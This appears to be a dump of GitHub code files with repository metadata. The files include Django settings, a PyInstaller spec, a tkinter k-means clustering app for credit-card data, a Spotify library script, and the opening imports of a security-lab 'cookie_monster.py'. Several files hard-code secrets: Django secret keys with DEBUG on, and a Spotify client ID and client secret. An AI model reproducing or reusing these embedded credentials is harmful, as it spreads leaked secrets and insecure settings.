blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
de443776aa84d3290318991589f034155c47b566
|
3244c110d230eb659edc1168ea02d8b9d2ea9ff5
|
/lab1/account.py
|
875989641b6264ee941508d53f5c9977956ae22f
|
[] |
no_license
|
thelloin/TDDA69_Data_And_Program_Structures
|
9f05228a35613f1917ba9fac03d2041d54400d09
|
5e2d6d750d1bcca5278341c72728891c3c510385
|
refs/heads/master
| 2021-01-11T14:59:04.070874
| 2017-05-22T18:38:11
| 2017-05-22T18:38:11
| 80,271,092
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 900
|
py
|
class AccountError(Exception):
    """Raised by account operations: bad timestamp or insufficient funds."""

    def __init__(self, value):
        # Payload describing the failure (a message string in this file).
        self.value = value

    def __str__(self):
        # BUG FIX: was `def str`, a plain method Python never calls for
        # str(exc); renamed to the __str__ protocol method so the message
        # actually shows up when the exception is printed.
        return repr(self.value)
def make_account(balance, interest):
    """Create a closure-based account accruing simple interest over time.

    On every operation the elapsed time since the previous operation is
    multiplied by `interest` and the current balance and added in, then
    the operation itself is applied.  Returns a dict exposing the public
    methods 'withdraw', 'deposit' and 'get_value'.
    """
    last_time = 0

    def _accrue(time):
        # Shared bookkeeping: timestamps must strictly increase; apply
        # interest for the elapsed period and advance the clock.
        nonlocal balance, last_time
        if time <= last_time:
            raise AccountError("Timestamp error")
        balance += (time - last_time) * interest * balance
        last_time = time

    def withdraw(amount, time):
        nonlocal balance
        _accrue(time)
        if balance < amount:
            raise AccountError("Account balance too low")
        balance -= amount

    def deposit(amount, time):
        nonlocal balance
        _accrue(time)
        balance += amount

    def get_value():
        return balance

    return {'withdraw': withdraw, 'deposit': deposit, 'get_value': get_value}
|
[
"tommy5545@gmail.com"
] |
tommy5545@gmail.com
|
0194081e4e86d0304d4fe64e144a7cd7f739f96c
|
3a8fa9bab6c128550adc469931bbd35439378ee8
|
/version0001/settings.py
|
8a45e4a1a22cdcf1b74ee63e3047de444b9335c4
|
[] |
no_license
|
hsubramani42/cloud_project
|
3d0d0b82172ac2286ce82bca5b9d6bb52d5c5dd1
|
3be9ab4d9935b772cb5b8273b4b2bd9a6ce07fc5
|
refs/heads/master
| 2023-08-22T23:58:48.007346
| 2021-10-05T13:08:13
| 2021-10-05T13:08:13
| 359,930,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,370
|
py
|
"""
Django settings for version0001 project.
Generated by 'django-admin startproject' using Django 3.0.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TEMPLATES_DIR=os.path.join(BASE_DIR,'templates')
STATIC_DIR=os.path.join(BASE_DIR,'static')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ddto9h==s%-qw8^ky9#%^_a@*3pp%q+cn&7g2djzl$%+*p5jvt'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ["*"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'MathClubVitap',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'version0001.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATES_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'version0001.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
STATIC_ROOT=os.path.join(BASE_DIR,'static')
BASE_URL = "http://127.0.0.1:8000"
|
[
"hsubramani42@gmail.com"
] |
hsubramani42@gmail.com
|
9901a824036dae08fe6bba801ad4961fa53f3672
|
3160425b60cba9c5817bdf953fa082de0fd8ef4c
|
/labelImg.spec
|
1ac78b75769490c4beaa5d24e456b79b189ec0f6
|
[] |
no_license
|
dashengjiadao/LabelImg
|
5a8fa391575eb7d1f816f593be78d0f6645e78d1
|
5aa184c623e188eaedefa33407a4506fdb44504f
|
refs/heads/main
| 2023-06-05T08:12:25.532826
| 2021-06-23T07:35:54
| 2021-06-23T07:35:54
| 337,600,980
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
spec
|
# -*- mode: python ; coding: utf-8 -*-
# PyInstaller build spec for the labelImg application.
# Names like Analysis, PYZ and EXE are injected by PyInstaller when it
# executes this spec — this is not an importable Python module.

block_cipher = None  # no bytecode encryption

a = Analysis(['labelImg.py'],
             # NOTE(review): machine-specific checkout path — adjust per build host.
             pathex=['E:\\Github\\LabelImg2'],
             binaries=[],
             datas=[],
             hiddenimports=[],
             hookspath=[],
             runtime_hooks=[],
             excludes=[],
             win_no_prefer_redirects=False,
             win_private_assemblies=False,
             cipher=block_cipher,
             noarchive=False)
# Archive of pure-Python modules discovered by the analysis above.
pyz = PYZ(a.pure, a.zipped_data,
          cipher=block_cipher)
# Single-file executable; console window kept for log/debug output.
exe = EXE(pyz,
          a.scripts,
          a.binaries,
          a.zipfiles,
          a.datas,
          [],
          name='labelImg',
          debug=False,
          bootloader_ignore_signals=False,
          strip=False,
          upx=True,
          upx_exclude=[],
          runtime_tmpdir=None,
          console=True )
|
[
"34080594+dashengjiadao@users.noreply.github.com"
] |
34080594+dashengjiadao@users.noreply.github.com
|
6878f9da2eeca9ddd2bb8ec9ab3d5255a6eb960d
|
fc9421f8108ff1c78ba85cdb7afd7958f837414f
|
/ITBones/ITBones/money/urls.py
|
667f3bc6fa6e4c056f563ddb7e032f28dc907f23
|
[] |
no_license
|
itbones/ITBones
|
a2d426ad6881c880aeb6b57dcbede756730ca9fc
|
16176c3252e67a4ffbba0306ee1861cba8f149c2
|
refs/heads/master
| 2021-08-31T23:53:43.264947
| 2017-12-23T15:38:24
| 2017-12-23T15:38:24
| 112,016,434
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 330
|
py
|
from django.conf.urls import url
from . import views
# BUG FIX: Django's URL namespacing reads ``app_name`` from this module;
# the bare ``app`` binding was never consulted by Django.  ``app`` is kept
# so any external importers of it keep working.
app = 'money'
app_name = 'money'

urlpatterns = [
    url(r'^$', views.index, name='index'),
    # NOTE(review): spaces in route names are unusual but must be kept —
    # templates reversing {% url 'Add Stock' %} depend on them.
    url(r'^addstock$', views.addstock, name='Add Stock'),
    url(r'^sendemail$', views.sendemail, name='Send Email'),
    url(r'^(?P<stockid>[0-9]+)/$', views.displaystock_v, name='Display Details'),
]
|
[
"itbonessolutions@gmail.com"
] |
itbonessolutions@gmail.com
|
5496363edf851bc2559b156493e669bb8d9513ff
|
96b9089ab9a98bb11361ca8757597dcfa8da517e
|
/KreditneKarticeProjekat/main.py
|
6151784825acee01ae0a299cb10fb9ce60894fc6
|
[] |
no_license
|
jovanakostres/ORIprojekat
|
53f8c1a6e96a797d05cf03fc50efca3acd20b5c5
|
bc1db841f0712b0d22988bf6d9dec4179fc2fb6a
|
refs/heads/master
| 2022-11-17T08:04:09.886981
| 2020-07-06T21:51:12
| 2020-07-06T21:51:12
| 263,088,365
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,490
|
py
|
import pandas
from pandas import DataFrame
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
import seaborn as sns
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
import tkinter as tk
import tkinter.ttk as ttk
from ttkthemes import ThemedStyle
from tkinter import filedialog
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from interpretation import cluster_report
from plotmultidim import plot_cluster
from plotmultidim2 import plot_clusters_2d, getElbow, getLabelsKMeans
# Load the credit-card dataset from the working directory and echo a summary.
Data = pandas.read_csv(r'credit_card_data.csv')
print(Data.describe())
# Feature subset used for clustering; CREDIT_LIMIT has missing values,
# filled with the column median below.
df2 = DataFrame(Data, columns=['BALANCE','PURCHASES','ONEOFF_PURCHASES','CASH_ADVANCE', 'PURCHASES_FREQUENCY', 'ONEOFF_PURCHASES_FREQUENCY','CREDIT_LIMIT'])
df2['CREDIT_LIMIT'] = df2['CREDIT_LIMIT'].fillna(df2['CREDIT_LIMIT'].median())
X_df = df2.__deepcopy__()
X_df.sample(5, random_state=0)  # NOTE(review): result unused — looks like a leftover sanity check
# Standardize, then project to 2 principal components for clustering/plots.
pipeline = Pipeline(steps=[
    ('scaler', StandardScaler()),
    ('dim_reduction', PCA(n_components=2, random_state=0))
])
pc = pipeline.fit_transform(X_df)
# pccent = pipeline.fit_transform(kmeans_model.centroid_list)
# One k-means cluster label per row, computed on the 2-D projection.
y_labels = getLabelsKMeans(pc)

# Main window with a themed canvas holding the action buttons.
root= tk.Tk()
root.title("Credit Cards")
style = ThemedStyle(root)
style.set_theme('arc')
#print(style.theme_names())
canvas1 = tk.Canvas(root, width = 400, height = 300, relief = 'raised')
canvas1.pack()
label1 = ttk.Label(root, text='k-Means Clustering')
label1.config(font=('helvetica', 14))
canvas1.create_window(200, 25, window=label1)
def getHistogrami():
    """Open a window with a (Serbian) analysis note and per-feature histograms."""
    # Toplevel object which will
    # be treated as a new window
    newWindow = tk.Toplevel(root)
    # sets the title of the
    # Toplevel widget
    newWindow.title("Analiza")
    # sets the geometry of toplevel
    newWindow.geometry("400x400")
    # A Label widget to show in toplevel
    ttk.Label(newWindow, text="Analiza podataka").pack()
    # Long interpretation text (implicit string concatenation across lines).
    make_label(newWindow, 10, 20, 380, 350, "Iznos koji je korisnik uplatio unapred (CASH_ADVANCE) i stanje na kartici (BALANCE) nalaze se u korelaciji tj., korisnik koji ima veće stanje će imati tendenciju da plaća iznosom koji je uplatio unapred. Takođe, korisnici koji imaju veće"
               "stanje na računu će verovatno imati i veći kreditni limit (CREDITLIMIT)." + "\n" + "Iz histograma vezanog za stanje na kartici možemo videti da korisnici koji aktivno koriste svoje kreditne kartice teže da maksimalno koriste svoje kreditne kartice sve dok stanje ne padne na 0. "
               " Histogram ukupnih iznosa potrošnih na kupovinu (PURCHASES) nam kaže da većina korisnika ne koristi svoje kreditne kartice za kupovinu, tek njih oko 40% koristi svoju kreditnu karticu u te svrhe. Limit većine korisnika kreditnih kartica je oko 1000.")
    # One distribution plot per clustering feature (7 plots in a 2x4 grid).
    f, axes = plt.subplots(2, 4, figsize=(30, 30))
    for ax, feature in zip(axes.flat, df2.columns):
        sns.distplot(df2[feature], color="green", ax=ax)
    plt.subplots_adjust(hspace=0.4, wspace=0.4)
    plt.show()
# Action buttons on the main canvas (callbacks defined above/below).
histButton = ttk.Button(root, text=' Show Histograms', command=getHistogrami)
canvas1.create_window(200, 120, window=histButton)
# Elbow plot for choosing k, computed on the 2-D PCA projection.
processButton = ttk.Button(root, text=' Show Elbow Method ', command= lambda: getElbow(pc))
canvas1.create_window(200, 150, window=processButton)
# Scatter of the clusters in PCA space; df2 copied so the plot cannot mutate it.
clustersButton = ttk.Button(root, text=' Show Clusters in 2D', command= lambda: plot_clusters_2d(df2.__deepcopy__(), y_labels,pc))
canvas1.create_window(200, 180, window=clustersButton)
def openNewWindow():
    """Open the cluster-analysis window: one tab per cluster, each with
    feature histograms and a (Serbian) interpretation note."""
    # Toplevel object which will
    # be treated as a new window
    newWindow = tk.Toplevel(root)
    # sets the title of the
    # Toplevel widget
    newWindow.title("Analiza")
    # sets the geometry of toplevel
    newWindow.geometry("1200x600")
    # A Label widget to show in toplevel
    ttk.Label(newWindow,
              text="Analiza klastera").pack()
    # Seven tabs — one per cluster (k=7 is fixed here, matching getLabelsKMeans).
    tab_parent = ttk.Notebook(newWindow)
    tab1 = ttk.Frame(tab_parent)
    tab2 = ttk.Frame(tab_parent)
    tab3 = ttk.Frame(tab_parent)
    tab4 = ttk.Frame(tab_parent)
    tab5 = ttk.Frame(tab_parent)
    tab6 = ttk.Frame(tab_parent)
    tab7 = ttk.Frame(tab_parent)
    tab_parent.add(tab1, text="Prvi klaster")
    tab_parent.add(tab2, text="Drugi klaster")
    tab_parent.add(tab3, text="Treci klaster")
    tab_parent.add(tab4, text="Cetvrti klaster")
    tab_parent.add(tab5, text="Peti klaster")
    tab_parent.add(tab6, text="Sesti klaster")
    tab_parent.add(tab7, text="Sedmi klaster")
    tab_parent.pack(expand=1, fill='both')
    # Map row index -> assigned cluster label, used by make_tab for filtering.
    cluster_map = pandas.DataFrame()
    cluster_map['data_index'] = df2.index.values
    cluster_map['cluster'] = y_labels
    make_tab(tab1,cluster_map,0)
    make_tab(tab2, cluster_map, 1)
    make_tab(tab3, cluster_map, 2)
    make_tab(tab4, cluster_map, 3)
    make_tab(tab5, cluster_map, 4)
    make_tab(tab6, cluster_map, 5)
    make_tab(tab7, cluster_map, 6)
    # Per-cluster interpretation notes (runtime strings — kept verbatim).
    make_label(tab1, 10, 10, 600, 330, text='Korisnici u ovom klasteru retko kupuju. Stanja na računu su niska i odlikuje ih niska potrošnja. Retko kupuju jednokratno. Kada kupuju, kupuju stvari za male pare.')
    make_label(tab2, 10, 10, 600, 330, text='Korisnici u ovom klasteru osrednje često do retko kupuju. Korisnici ove grupe koji imaju nisku količinu novca na racunu retko jednokratno kupuju, ali uplaćuju vece sume novca unapred. Dok korisnici koji imaju osrednju kolicinu novca na računu imaju veci kreditni limit, ali uplaćuju manje sume novca unapred.')
    make_label(tab3, 10, 10, 600, 330, text='Korisnici u ovom klasteru osrednje često do retko kupuju. Stanja novca na računu su visoka i odlikuje ih niska potrošnja tokom kupovine. Kreditni limit i iznosi koje uplaćuju unapred na njihovim karticama su visoki. Predstavljaju osrednje korisnike kreditnih kartica.')
    make_label(tab4, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju, ali retko kupuju jednokratno. Stanja na računu su niska i odlikuje ih niska potrošnja. Kreditni limit je osrednji. Niske uplate iznosa unapred. Kada kupuju, kupuju jeftinije stvari.')
    make_label(tab5, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju u šta spadaju i jednokratne kupovine. Osrednje do nisko stanje novca na kartici i troše velike iznose. Visoki kreditni limit i niski iznosi uplata unapred. Veliki potrošači.')
    make_label(tab6, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju i srednje do veoma često jednokratno kupuju. Stanja na računu su niska i odlikuje ih niski do srednji iznosi potrošnja. Osrednji iznos kreditnog limita i niski iznosi uplata unapred.')
    make_label(tab7, 10, 10, 600, 330, text='Korisnici u ovom klasteru često kupuju u šta spadaju i jednokratne kupovine. Stanja na računu su osrednja i odlikuje ih visoki iznosi potrošnja. Visoki iznos kreditnog limita i niski iznosi uplata unapred.')

# Button on the main canvas: print a textual report of the clusters to stdout.
clusterReportButton = ttk.Button(root, text='Print Clusters Report', command=lambda: cluster_report(df2, y_labels, 10, 0.01))
canvas1.create_window(200, 210, window=clusterReportButton)
def make_tab(tab, cluster_map, cluster_num):
    """Fill *tab* with a 2x4 grid of feature histograms for one cluster.

    Parameters:
        tab: ttk.Frame to receive the embedded matplotlib canvas.
        cluster_map: DataFrame with 'data_index' and 'cluster' columns
            mapping each row of the global `df2` to its cluster label.
        cluster_num: which cluster's rows to plot.
    """
    # (column, short title) pairs; titles intentionally abbreviated to fit.
    # Replaces seven copy-pasted subplot blocks with one data-driven loop.
    panels = [
        ('BALANCE', 'BALANCE'),
        ('PURCHASES', 'PURCHASES'),
        ('ONEOFF_PURCHASES', 'ONEOFF PURCHASES'),
        ('CASH_ADVANCE', 'CASH ADVANCE'),
        ('PURCHASES_FREQUENCY', 'P. FREQUENCY'),
        ('ONEOFF_PURCHASES_FREQUENCY', 'OP FREQUENCY'),
        ('CREDIT_LIMIT', 'CREDIT LIMIT'),
    ]
    figure1 = plt.Figure(figsize=(8.5, 4), dpi=100)
    # Rows belonging to this cluster — computed once instead of per panel
    # (the original recomputed this O(n) filter seven times).
    members = df2[df2.index.isin(cluster_map[cluster_map.cluster == cluster_num]['data_index'])]
    # Subplot positions 241..247 reproduce the original 2x4 layout.
    for position, (column, title) in enumerate(panels, start=241):
        ax = figure1.add_subplot(position)
        ax.hist(members[column])
        ax.set_title(title)
    figure1.set_tight_layout(True)
    scatter1 = FigureCanvasTkAgg(figure1, tab)
    scatter1.get_tk_widget().pack(side=tk.RIGHT, fill=tk.BOTH)
def make_label(master, x, y, h, w, text):
    """Place a fixed-size, word-wrapped text block on *master*.

    The text lives inside a frame whose geometry is pinned (no shrinking
    to fit content); returns the tk.Message widget so callers may restyle it.
    """
    container = ttk.Frame(master, height=h - 60, width=w)
    container.pack_propagate(0)  # don't shrink
    container.place(x=x, y=y)
    message = tk.Message(container, text=text, width=w - 10, anchor='n' )
    message.configure(font=("Calibri", 12, "normal"))
    message.pack(fill=tk.BOTH, expand=1)
    return message
def printNesto():
    # Debug helper ("print something"): dump the cluster labels.
    # NOTE(review): not wired to any button — presumably leftover.
    print(y_labels)

# Opens the per-cluster analysis window defined above.
prntButton = ttk.Button(root, text=' Cluster Analysis', command=openNewWindow)
canvas1.create_window(200, 240, window=prntButton)

root.mainloop()
'''
if __name__ == '__main__':
Data = {
'x': [25, 34, 22, 27, 33, 33, 31, 22, 35, 34, 67, 54, 57, 43, 50, 57, 59, 52, 65, 47, 49, 48, 35, 33, 44, 45,
38, 43, 51, 46],
'y': [79, 51, 53, 78, 59, 74, 73, 57, 69, 75, 51, 32, 40, 47, 53, 36, 35, 58, 59, 50, 25, 20, 14, 12, 20, 5, 29,
27, 8, 7]
}
df = DataFrame(Data, columns=['x', 'y'])
Data = pandas.read_csv(r'credit_card_data.csv')
print(Data.describe())
df = DataFrame(Data, columns=['BALANCE'])
df2 = DataFrame(Data, columns=['BALANCE','PURCHASES','ONEOFF_PURCHASES','CASH_ADVANCE', 'PURCHASES_FREQUENCY', 'ONEOFF_PURCHASES_FREQUENCY','CREDIT_LIMIT'])
df2['CREDIT_LIMIT'] = df2['CREDIT_LIMIT'].fillna(df2['CREDIT_LIMIT'].median())
#print(df2)
#df2['MINIMUM_PAYMENTS'] = df2['MINIMUM_PAYMENTS'].fillna(df2['MINIMUM_PAYMENTS'].median())
#df2.dropna(subset=['CREDIT_LIMIT'], inplace=True)
print(df2.isnull().sum())
#getElbow()
#kmeans = KMeans(n_clusters=4).fit(df)
#kmeans = KMeans(n_clusters=8, init='k-means++', random_state=101).fit(df2)
#centroids = kmeans.cluster_centers_
#print(centroids)
#print(df2['BALANCE'].index.values)
#plt.scatter(df2['BALANCE'].index.values,df2['BALANCE'], c=kmeans.labels_.astype(float), s=50, alpha=0.5)
#plt.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
#plt.show()
#plot_cluster(df2.to_numpy(), kmeans.cluster_centers_, kmeans.labels_, 8)
y_cl = plot_clusters_2d(df2.__deepcopy__())
cluster_report(df2, y_cl.labels_,10,0.01)
def getKMeans():
global numberOfClusters
Data = pandas.read_csv(r'credit_card_data.csv')
df = DataFrame(Data, columns=['BALANCE', 'BALANCE_FREQUENCY'])
numberOfClusters = int(entry1.get())
kmeans = KMeans(n_clusters=numberOfClusters).fit(df)
centroids = kmeans.cluster_centers_
label3 = tk.Label(root, text=centroids)
canvas1.create_window(200, 250, window=label3)
figure1 = plt.Figure(figsize=(4, 3), dpi=100)
ax1 = figure1.add_subplot(111)
ax1.scatter(df['BALANCE'], df['BALANCE_FREQUENCY'], c=kmeans.labels_.astype(float), s=50, alpha=0.5)
ax1.scatter(centroids[:, 0], centroids[:, 1], c='red', s=50)
scatter1 = FigureCanvasTkAgg(figure1, root)
scatter1.get_tk_widget().pack(side=tk.RIGHT, fill=tk.BOTH)
'''
|
[
"jovanako15@gmail.com"
] |
jovanako15@gmail.com
|
4af3b0aea7e2f909a2c5d316c59783093ffc5ef5
|
0d182889379814038e48b4a5549df59401e8e257
|
/Higher_Education_Information_System/settings.py
|
0b2d3329c3ce47250370420c05b1bbfc0585c47c
|
[] |
no_license
|
amanishimwe/IUCEA
|
eaa774edb98c43c815fba95e61aca992b9939a3d
|
69557dd061c1bf55c060c02fd895544ae023e0ae
|
refs/heads/master
| 2023-05-31T07:14:43.999699
| 2021-07-11T12:20:27
| 2021-07-11T12:20:27
| 384,943,785
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,423
|
py
|
"""
Django settings for Higher_Education_Information_System project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'lovfcmj3j00f()n=%c(rp=_)wj8bqg*iis2_)&(dq-ky&+!iwv'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'academic_programs_information_system',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Higher_Education_Information_System.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates')
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Higher_Education_Information_System.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'heis',
'USER': 'root',
'PASSWORD':'',
'HOST': 'localhost',
'PORT': '3306',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
|
[
"alban.manishimwe@gmail.com"
] |
alban.manishimwe@gmail.com
|
16197b03f8829d17859f944f63d22a55d7e81fc0
|
fb0302e9fa08852e6b97031745423e5ddcd83313
|
/music_playlists.py
|
3da9c731e63d59d3d103e33cb03e5df6a73eb069
|
[] |
no_license
|
IsaiahWitzke/SpotifyToYoutube
|
a92a213a9adda8413de6c64373a7eb7aa5be752f
|
b66df1da83ff373e14efc384e6be69c489d74fb6
|
refs/heads/master
| 2020-12-29T05:05:37.391846
| 2020-02-05T14:08:57
| 2020-02-05T14:08:57
| 238,464,371
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,223
|
py
|
import sys
import os
import spotipy
import spotipy.util as util
# Spotify OAuth scope: read the user's saved library.
scope = 'user-library-read'

# BUG FIX: ``os.system("export VAR=...")`` runs in a child shell that exits
# immediately, so the variables never reached this process (or spotipy's
# credential lookup).  Set them in this process's environment instead.
# NOTE(review): these credentials are hard-coded in the repository — they
# should be rotated and loaded from the environment or a config file.
os.environ['SPOTIPY_CLIENT_ID'] = 'aae63f05cceb4e8d87386f8ade1eed52'
os.environ['SPOTIPY_CLIENT_SECRET'] = '67338d34cf894ddcb65e5eb0f1b41b05'
os.environ['SPOTIPY_REDIRECT_URI'] = 'localhost'

# The Spotify username comes from the command line.
if len(sys.argv) > 1:
    username = sys.argv[1]
else:
    print("Usage: %s username" % (sys.argv[0],))
    sys.exit()

# Interactive OAuth flow; opens a browser on first run and caches the token.
token = util.prompt_for_user_token(username, scope)

if token:
    sp = spotipy.Spotify(auth=token)
    # Print "title - artist" for each saved track (first page only).
    results = sp.current_user_saved_tracks()
    for item in results['items']:
        track = item['track']
        print(track['name'] + ' - ' + track['artists'][0]['name'])
else:
    print("Can't get token for", username)

'''
birdy_uri = 'spotify:artist:2WX2uTcsvV5OnS0inACecP'
spotify = spotipy.Spotify()
util.prompt_for_user_token(username,scope,client_id='your-spotify-client-id',client_secret='your-spotify-client-secret',redirect_uri='your-app-redirect-url')
results = spotify.artist_albums(birdy_uri, album_type='album')
albums = results['items']
while results['next']:
    results = spotify.next(results)
    albums.extend(results['items'])
for album in albums:
    print(album['name'])
'''
|
[
"noreply@github.com"
] |
IsaiahWitzke.noreply@github.com
|
10e4a7609ccf0eac6870626b7d0b21f2794c75a6
|
3ff99004a3bddb522e7778073bee5b07d953c043
|
/common/migrations/0006_auto_20200826_0055.py
|
094836bae92cff4ba5a5fc0f34baebf22e4e9acf
|
[] |
no_license
|
rimi-dev/modeling
|
8134e73300eaf159d9c3214f5ef513ec8241f062
|
777a1b587a1446ee73457d8ec18e0097d041700c
|
refs/heads/master
| 2022-12-10T07:17:27.704954
| 2020-08-26T05:24:46
| 2020-08-26T05:24:46
| 289,538,099
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 390
|
py
|
# Generated by Django 3.1 on 2020-08-26 00:55
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter ``common.CompanyCarCount.count`` to an IntegerField with default 0."""

    # Must run after the previous `common` migration.
    dependencies = [
        ('common', '0005_auto_20200825_0138'),
    ]

    operations = [
        migrations.AlterField(
            model_name='companycarcount',
            name='count',
            field=models.IntegerField(default=0),
        ),
    ]
|
[
"yerimi@kakao.com"
] |
yerimi@kakao.com
|
ff5ad551094fe09dde93eacb62fed9e8b88e910f
|
68087c1047211658a7af639e0168752b81008031
|
/lab2/cookie_monster.py
|
2c7e1c70ac2df51505f1cf486d6919cb6964cba4
|
[] |
no_license
|
barchuckie/computer-security
|
a9184ec92316f7f25706fd9bb0df0abaa18bfbbf
|
3bfd661a1107ee901e3e9f2e695a3670b8e582ef
|
refs/heads/master
| 2023-04-27T04:20:22.763607
| 2020-04-30T08:42:07
| 2020-04-30T08:42:07
| 219,340,323
| 0
| 0
| null | 2023-04-21T20:41:22
| 2019-11-03T17:41:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,278
|
py
|
import subprocess
import session_id_parser
